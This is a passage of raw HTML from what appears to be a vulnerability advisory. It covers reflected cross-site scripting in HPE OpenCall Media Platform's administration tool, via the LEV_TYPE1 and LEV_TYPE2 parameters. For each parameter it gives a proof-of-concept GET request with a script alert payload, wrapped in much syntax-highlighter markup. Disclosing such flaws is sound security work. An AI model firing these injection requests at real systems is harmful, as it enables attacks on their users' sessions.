class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83631817388389-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83631817388389-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83631817388389-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83631817388389-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83631817388389-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83631817388389-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0085 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_TYPE1<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize <em>GetMapAction <\/em>function parameter <em>LEV_TYPE1 <\/em>input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL:<br \/> \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;<strong>LEV_TYPE1<\/strong>=T14527a&#8221;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;2d848&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83637585027595\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T14527a&#8221;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;2d848&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83637585027595-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83637585027595-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83637585027595-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83637585027595-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83637585027595-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83637585027595-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83637585027595-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83637585027595-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83637585027595-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83637585027595-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83637585027595-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">T14527a<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">2d848<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83637585027595-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83637585027595-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83637585027595-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83637585027595-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83637585027595-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83637585027595-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83637585027595-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83637585027595-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83637585027595-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0059 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>LEV_TYPE2<\/em> parameter<\/strong><br \/> HPE OpenCall Media Platform (OCMP) does not sanitize <em>GetMapAction<\/em> function parameter LEV_TYPE2 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;<strong>LEV_TYPE2<\/strong>=T2522b2&#8243;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;54f45&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><br \/> An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da8363f671945357\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2522b2&#8243;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;54f45&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8363f671945357-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8363f671945357-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8363f671945357-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8363f671945357-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8363f671945357-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8363f671945357-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8363f671945357-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8363f671945357-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8363f671945357-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8363f671945357-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da8363f671945357-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">T2522b2<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">54f45<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8363f671945357-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8363f671945357-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8363f671945357-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8363f671945357-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 